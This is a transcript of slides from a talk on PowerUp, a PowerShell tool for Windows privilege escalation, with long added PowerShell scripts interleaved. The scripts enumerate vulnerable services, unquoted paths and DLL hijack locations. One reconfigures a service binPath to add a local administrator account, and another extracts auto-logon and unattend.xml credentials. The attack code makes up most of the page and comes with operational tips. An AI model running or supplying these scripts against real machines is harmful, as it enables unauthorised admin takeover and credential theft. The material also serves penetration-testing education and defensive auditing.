Transcript
Page 1: PowerUp - Automating Windows Privilege Escalation

Automating Windows Privilege Escalation

Will (@harmj0y)

Veris Group, Adaptive Threat Division

Page 2

$ whoami

Security researcher and pentester/red teamer for the Adaptive Threat Division of Veris Group

Co-founder of the Veil-Framework (#avlol), www.veil-framework.com

Shmoocon '14: AV Evasion with the Veil Framework

Co-wrote Veil-Evasion, wrote Veil-Catapult and Veil-PowerView

BSides Austin ‘14: Wielding a Cortana

BSides Boston ’14: Pwnstaller 1.0

Defcon ’14 (accepted): Post-Exploitation 2.0

Page 3

tl;dr

Why PowerShell?

Why build this?

Windows Service Vulnerabilities

PowerUp: service enumeration, service abuse, misc. methods

Demo

Questions

Page 4

Why PowerShell?

Really need to say anything?

Whitelisted, trusted execution, full .NET capabilities, can refrain from touching disk, etc. etc. etc.

Use it, yo': PowerSploit, Posh-SecMod, Veil-PowerView, Nishang

Page 5

Why build this?

On a recent assessment, had to escalate privileges on a locked down workstation

Kernel exploits wouldn't work, so fell back to vulnerable services

Service binary had improper permissions

Replacing the .exe and bouncing the box took us from no privs to local admin

More or less did everything manually, wanted something a bit easier

Page 6

Windows Service Vulnerabilities

Page 7

Trusted Path Escalation

Metasploit module: trusted_service_path.rb

If a service's image path is unquoted and contains a space, CreateProcess has to guess where the executable name ends and the arguments begin, and it tries the shortest interpretation first

E.g. C:\Tools\Custom Tools\program.exe will be tried as C:\Tools\Custom.exe first, then as C:\Tools\Custom Tools\program.exe

If you have write access to a directory along the way (here C:\Tools\), drop your own Custom.exe there and it runs as the service account on the next start, money!

Page 8

Vulnerable Service Permissions

Also a Metasploit module: service_permissions.rb

Check if the current user can modify the service configuration itself (SERVICE_CHANGE_CONFIG, or WRITE_DAC/WRITE_OWNER, which get you there)

Replace the binary path for the service with something like "net user john password /add" and bounce the service; the command runs as the service account (usually LocalSystem), so the user gets added

Repeat with "net localgroup administrators john /add"

Can be done by hand with accesschk.exe (to read the service ACL) and sc.exe (sc config, sc stop, sc start)
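The manual sequence above wrapped in PowerShell, as an added example that is not code from the slides and not PowerUp's own Invoke-ServiceUserAdd (which does the same job). It reads the service DACL with sc.exe sdshow, checks the current token for SERVICE_CHANGE_CONFIG or a right that yields it (WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL), performs the binPath swap for both net commands, and restores the original configuration. The service name 'VulnSvc' and the user/password in the usage line are placeholders, and PowerShell 3 or later is assumed for the CIM cmdlets.

```powershell
# Added example, not PowerUp's code. Inside PowerShell "sc" is an alias for
# Set-Content, so the service controller is always called as sc.exe here.
# 'VulnSvc' in the usage line is a placeholder service name.

function Test-ServiceConfigurable {
    param([string]$Name)
    $sddl = @(sc.exe sdshow $Name 2>$null | Where-Object { $_ -match '^D:' })
    if (-not $sddl) { return $false }
    # RawSecurityDescriptor parses SDDL and expands aliases such as BA/IU/SY to SIDs
    $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl[0].Trim())
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # SERVICE_CHANGE_CONFIG (DC) | WRITE_DAC (WD) | WRITE_OWNER (WO) | GENERIC_ALL (GA) | GENERIC_WRITE (GW)
    $mask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if (($mine -contains $ace.SecurityIdentifier.Value) -and (($ace.AccessMask -band $mask) -ne 0)) { return $true }
    }
    return $false
}

function Invoke-ServiceCommand {
    # Point binPath at an arbitrary command and bounce the service: SCM runs it as
    # the service account (usually LocalSystem). "net" never checks in as a real
    # service, so "sc start" fails with error 1053 after its timeout, but by then
    # the command has already run.
    param([string]$Name, [string]$Command)
    sc.exe config $Name binPath= "$Command" | Out-Null    # the space after "binPath=" is required
    sc.exe stop  $Name 2>$null | Out-Null                 # needs SERVICE_STOP; harmless if already stopped
    sc.exe start $Name 2>$null | Out-Null
}

function Invoke-ServiceAddLocalAdmin {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$User,
        [Parameter(Mandatory)][string]$Password,   # 14 chars or fewer: longer makes "net user" prompt for confirmation and hang
        [string]$Group = 'Administrators'
    )
    if (-not (Test-ServiceConfigurable $Name)) { throw "current user cannot reconfigure service '$Name'" }
    $cfg = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $cfg) { throw "service '$Name' not found" }
    try {
        if ($cfg.StartMode -eq 'Disabled') { sc.exe config $Name start= demand | Out-Null }
        Invoke-ServiceCommand $Name "net user $User $Password /add"
        Invoke-ServiceCommand $Name "net localgroup $Group $User /add"
    } finally {
        # Restore the original image path through the WMI Change method, which
        # takes the stored string as-is instead of re-quoting it through sc.exe.
        Invoke-CimMethod -InputObject $cfg -MethodName Change -Arguments @{ PathName = $cfg.PathName } | Out-Null
        if ($cfg.StartMode -eq 'Disabled') { sc.exe config $Name start= disabled | Out-Null }
        if ($cfg.State -eq 'Running') { sc.exe start $Name 2>$null | Out-Null }
    }
}

Invoke-ServiceAddLocalAdmin -Name 'VulnSvc' -User 'john' -Password 'P@ssw0rd1234'
```

Two practical caveats: the command launched from binPath is not a real service, so sc start reports error 1053 once its timeout expires, after the command has already run; and net user asks for confirmation on passwords longer than 14 characters, which would hang the service-launched process, so keep the password short. Without SERVICE_STOP on a running service the new binPath is only picked up at the next restart, which is where bouncing the box comes in.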

Page 9

Vulnerable EXE Permissions

Check the permissions on each executable a service runs

If you can write to the executable path for a service, replace the binary with something that adds a local admin (or pops a Meterpreter shell)

If you can't bounce the service, bounce the box (a running service's .exe can't be opened for writing, so the replacement goes in while the service is stopped or after moving the original aside, and only takes effect on the next start)

This is how we ended up escalating in the field
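An added PowerShell enumeration covering the checks from pages 7 and 9, written for this page and not taken from PowerUp or the slides (it looks for the same conditions Get-ServiceUnquoted and Get-ServiceEXEPerms target, but is an independent implementation). It walks every service and reports the space-split prefixes of an unquoted image path whose parent directory the current user can write to, and service executables the current user can overwrite. It assumes PowerShell 3 or later for Get-CimInstance; the candidate-path logic follows the CreateProcess rule described on page 7.

```powershell
# Added example, not PowerUp's code. Reports two findings per service:
#  - UnquotedPath: a prefix of an unquoted image path whose directory we can write to
#  - WritableExe:  a service executable we can overwrite
# Runs unprivileged; on hosts older than PowerShell 3 use Get-WmiObject Win32_Service.

function Test-WritableDirectory {
    # Probe by creating and deleting a file: reading the ACL alone misses Deny
    # ACEs, nested groups and inheritance, an actual write does not.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch { return $false }
}

function Test-AclWrite {
    # Fallback for files a running service has mapped (they cannot be opened for
    # writing): look for an Allow ACE granting a write-class right to any SID in
    # the token. Deny ACEs are ignored, so a hit means "probably writable once stopped".
    param([string]$Path)
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # WriteData | AppendData | Delete | ChangePermissions | TakeOwnership | GENERIC_ALL | GENERIC_WRITE
    $writeMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($sids -contains $sid) -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Test-WritableFile {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    try {
        $fs = [System.IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite')
        $fs.Close()
        return $true
    } catch {
        $e = $_.Exception
        if ($e.InnerException) { $e = $e.InnerException }   # unwrap PowerShell's method-invocation wrapper
        # IOException = sharing violation, the image is in use: fall back to the ACL
        if ($e -is [System.IO.IOException]) { return (Test-AclWrite $Path) }
        return $false
    }
}

function Get-UnquotedPathCandidates {
    # CreateProcess resolves an unquoted image path by trying each space-delimited
    # prefix with ".exe" appended before the full path, so for
    #   C:\Tools\Custom Tools\program.exe   it tries   C:\Tools\Custom.exe   first.
    # Returns the executable that resolves plus every path tried before it, or $null
    # when no prefix exists on disk (stale service, nothing to hijack).
    param([string]$PathName)
    $tokens = $PathName -split ' '
    $tried  = @()
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $prefix = $tokens[0..$i] -join ' '
        if (Test-Path -LiteralPath $prefix -PathType Leaf) {
            return [PSCustomObject]@{ Executable = $prefix; TriedFirst = $tried }
        }
        $tried += "$prefix.exe"
    }
    return $null
}

function Get-VulnerableServicePaths {
    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        $path = $svc.PathName
        if (-not $path) { continue }
        $exe = $null
        if ($path -match '^"([^"]+)"') {
            $exe = $Matches[1]                              # quoted: the loader cannot be confused
        } elseif ($path -match ' ') {
            $res = Get-UnquotedPathCandidates $path
            if (-not $res) { continue }
            $exe = $res.Executable
            foreach ($cand in @($res.TriedFirst | Select-Object -Unique)) {
                if (Test-WritableDirectory (Split-Path -Parent $cand)) {
                    [PSCustomObject]@{ Service = $svc.Name; Issue = 'UnquotedPath'; Path = $cand; RunAs = $svc.StartName; State = $svc.State }
                }
            }
        } else {
            $exe = $path
        }
        if ($exe -and (Test-WritableFile $exe)) {
            [PSCustomObject]@{ Service = $svc.Name; Issue = 'WritableExe'; Path = $exe; RunAs = $svc.StartName; State = $svc.State }
        }
    }
}

Get-VulnerableServicePaths | Format-Table -AutoSize
```

Run it from the unprivileged session you are escalating from. An UnquotedPath hit only matters if the service runs as a more privileged account (see RunAs) and can be restarted, or the box rebooted; a WritableExe hit on a running service means the ACL allows the write but the image stays locked until the service stops.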

Page 10

Escalation Automation With PowerShell

Page 11

PowerUp

Implements methods to easily enumerate and abuse misconfigured Windows services for the purposes of privilege escalation

Have started to implement additional common Windows privesc vectors: .dll hijacking, AlwaysInstallElevated, etc.

http://www.harmj0y.net/blog/powershell/powerup/

https://github.com/HarmJ0y/PowerUp

Page 12

Service Enumeration

Get-ServiceUnquoted will find all services with unquoted paths and a space in the full path name

Get-ServicePerms enumerates all services the current user has modification rights to

Get-ServiceEXEPerms checks all associated service executables and returns any paths the user has write access to

Page 13

Service Abuse

Invoke-ServiceUserAdd enables/stops a service, reconfigures it to create a user and add them to the local admins, restarts, etc.

Write-UserAddServiceBinary generates a precompiled C# service binary and binary-patches in the service name, username/password and group to add a user to

Can easily write the binary out to any unquoted paths

Write-ServiceEXE writes a service binary out to a given service path, backing up the original .exe

Page 14

Misc. Checks I

Invoke-FindDLLHijack is a (kind of) port of Mandiant's FindDLLHijack code

Checks each running process and its loaded modules, and returns all hijackable locations, i.e. any base "exe path + loaded module name" that doesn't exist (the loader searches the exe's own directory first, so a same-named DLL dropped there gets picked up ahead of the one currently loaded)

Invoke-FindPathDLLHijack finds potentially hijackable service .DLL locations from %PATH%

Check out http://www.greyhathacker.net/?p=738 for more information
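The "exe directory + loaded module name" check described above, as an added example that is neither PowerUp's nor Mandiant's code, with one refinement: with the default search order the loader looks in the application directory before System32 and %PATH%, so a DLL a process loaded from anywhere else can be shadowed by a same-named file beside the executable, unless it is a KnownDLL, which the loader maps from System32 regardless. Those names are read from the registry and filtered out. Function names are my own.

```powershell
# Added example, not PowerUp's or Mandiant's code.

function Get-KnownDllNames {
    # KnownDLLs are always mapped from System32 and cannot be shadowed from the
    # application directory, so they are excluded from the results.
    $key = Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs' -ErrorAction SilentlyContinue
    if (-not $key) { return @() }
    foreach ($n in $key.GetValueNames()) {
        if ($n -like 'DllDirectory*') { continue }      # these two values hold paths, not DLL names
        $v = [string]$key.GetValue($n)
        if ($v) { $v.ToLower() }
    }
}

function Find-DllHijackCandidate {
    $known = @(Get-KnownDllNames)
    foreach ($proc in Get-Process) {
        # Module lists of protected, other-user or cross-bitness processes are not
        # readable from an unprivileged (or 32-bit) session; skip rather than abort.
        try { $exe = $proc.MainModule.FileName; $mods = @($proc.Modules) } catch { continue }
        if (-not $exe) { continue }
        $dir = Split-Path -Parent $exe
        foreach ($m in $mods) {
            $name = $m.ModuleName
            if (-not $name -or -not $m.FileName -or $name -notmatch '\.dll$') { continue }
            if ($known -contains $name.ToLower()) { continue }
            if ((Split-Path -Parent $m.FileName) -ieq $dir) { continue }   # already loaded from the app dir
            $candidate = Join-Path $dir $name
            if (-not (Test-Path -LiteralPath $candidate)) {
                [PSCustomObject]@{ Process = $proc.ProcessName; Id = $proc.Id; HijackPath = $candidate; LoadedFrom = $m.FileName }
            }
        }
    }
}

Find-DllHijackCandidate | Sort-Object HijackPath -Unique | Format-Table -AutoSize
```

A hit still needs two more things before it is an escalation: write access to the reported directory, and a process (or its next start) running in a context above yours. Modules loaded by absolute path are unaffected by the search order and will show up as false positives, so compare LoadedFrom against what the application actually calls.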

Page 15

Misc. Checks II

Get-RegAlwaysInstallElevated checks if the AlwaysInstallElevated registry value is enabled (it has to be set under both HKLM and HKCU to take effect)

Write-UserAddMSI can then write out an MSI installer that prompts for a local admin to add

Get-UnattendedInstallFiles finds unattended .xml install files that may have leftover credentials

Get-RegAutoLogon extracts any auto logon credentials from the Windows registry

Invoke-AllChecks will run all current privesc checks
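The registry and unattend checks above as an added PowerShell example, written for this page rather than taken from PowerUp (the function names are deliberately different from PowerUp's): the AlwaysInstallElevated pair of registry values, Winlogon auto-logon credentials, and credentials left in unattended-install answer files, including the base64 form Windows uses for non-plaintext passwords. The list of answer-file locations is the usual set and is an assumption, not something the slides state.

```powershell
# Added example, not PowerUp's code.

function Get-AlwaysInstallElevatedState {
    # Both values have to be 1; the HKCU value on its own is ignored by msiexec.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($v -ne 1) { return $false }
    }
    return $true
}

function Get-AutoLogonCredential {
    # Only a clear-text DefaultPassword is readable here. With AutoAdminLogon=1 but
    # no DefaultPassword, the password lives in the LSA "DefaultPassword" secret,
    # which needs SYSTEM to read.
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl -and ($wl.DefaultPassword -or $wl.AutoAdminLogon -eq '1')) {
        [PSCustomObject]@{ Domain = $wl.DefaultDomainName; User = $wl.DefaultUserName; Password = $wl.DefaultPassword; AutoAdminLogon = $wl.AutoAdminLogon }
    }
}

function ConvertFrom-UnattendPassword {
    # A non-plaintext <Password><Value> is base64(UTF-16LE(password + suffix)): the
    # suffix is "Password" under <AutoLogon>/<LocalAccount> and "AdministratorPassword"
    # under <UserAccounts>. Anything that does not decode is returned untouched.
    param([string]$Value, [string]$Suffix)
    try {
        $s = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
        if ($s.EndsWith($Suffix)) { return $s.Substring(0, $s.Length - $Suffix.Length) }
        return $s
    } catch { return $Value }
}

function Get-UnattendCredential {
    # Usual answer-file locations (assumed list, extend as needed)
    $files = "$env:SystemDrive\unattend.xml",
             "$env:windir\Panther\Unattend.xml",
             "$env:windir\Panther\Unattend\Unattend.xml",
             "$env:windir\System32\Sysprep\Unattend.xml",
             "$env:windir\System32\Sysprep\Panther\Unattend.xml",
             "$env:windir\System32\Sysprep\sysprep.xml"
    # element -> @(suffix used in the base64 form, child element naming the account)
    $targets = @{ AutoLogon = @('Password', 'Username'); LocalAccount = @('Password', 'Name'); AdministratorPassword = @('AdministratorPassword', '') }
    foreach ($f in $files) {
        if (-not (Test-Path -LiteralPath $f)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $f -Raw -ErrorAction Stop } catch { continue }
        foreach ($tag in $targets.Keys) {
            $suffix, $userTag = $targets[$tag]
            # unattend.xml uses a default namespace; matching on local-name() avoids a namespace manager
            foreach ($node in $doc.SelectNodes("//*[local-name()='$tag']")) {
                $pw = if ($tag -eq 'AdministratorPassword') { $node } else { $node.SelectSingleNode("*[local-name()='Password']") }
                if (-not $pw) { continue }
                $val = $pw.SelectSingleNode("*[local-name()='Value']")
                if (-not $val) { continue }
                $plain  = $pw.SelectSingleNode("*[local-name()='PlainText']")
                $secret = if ($plain -and $plain.InnerText -eq 'true') { $val.InnerText } else { ConvertFrom-UnattendPassword $val.InnerText $suffix }
                $user   = if ($userTag) { $node.SelectSingleNode("*[local-name()='$userTag']") }
                [PSCustomObject]@{ File = $f; Element = $tag; User = $(if ($user) { $user.InnerText } else { 'Administrator' }); Password = $secret }
            }
        }
    }
}

"AlwaysInstallElevated: $(Get-AlwaysInstallElevatedState)"
Get-AutoLogonCredential
Get-UnattendCredential | Format-Table -AutoSize
```

The AlwaysInstallElevated check returns true only when both the machine and the per-user policy value are 1, which is the condition under which msiexec runs a user-supplied MSI as SYSTEM; the decoder strips the per-element suffix Windows appends before base64-encoding, so a value that was already plain text passes through unchanged.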

Page 16

Demo

